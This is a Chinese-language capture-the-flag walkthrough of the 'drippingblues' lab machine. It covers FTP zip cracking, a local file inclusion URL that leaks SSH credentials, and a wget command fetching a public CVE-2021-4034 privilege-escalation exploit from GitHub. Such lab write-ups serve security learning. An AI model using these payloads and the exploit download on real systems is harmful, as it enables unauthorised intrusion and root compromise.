drippingblues 靶机实战

目录

信息收集:

Nmap:

存活:

端口:

服务:

Web:

目录扫描:

提权

信息收集:

Nmap:

存活:

靶机ip:192.168.10.110

端口:

服务:

发现ftp服务可以匿名登录。且用户名是FTP。

发现一个压缩包,下载并爆破。

得到密码 072528035。发现关键字 drip。里面还有一个 secret.zip(秘密)。

Web:

发现俩可疑用户名。 travisscott & thugger

目录扫描:

发现 robots.txt 看看内容。

发现俩目录,访问看看。

没啥用 上面的目录还不能访问,我们去fuzz测试一下。

这边一直爆200 我也不知道啥问题,,,

关键字应该是 压缩包的txt 内容 drip 。

猜测是文件包含漏洞。

url: http://192.168.10.110/index.php?drip=/etc/dripispowerful.html

发现密码

得到用户名密码 thugger/imdrippinbiatch

提权:

ssh登录上去后,上传提权检测脚本文件。

靶机执行该文件:

下载检测出来的提权脚本。

发现靶机没有gcc,不能进行编译,,,换个python脚本。

wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip

  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值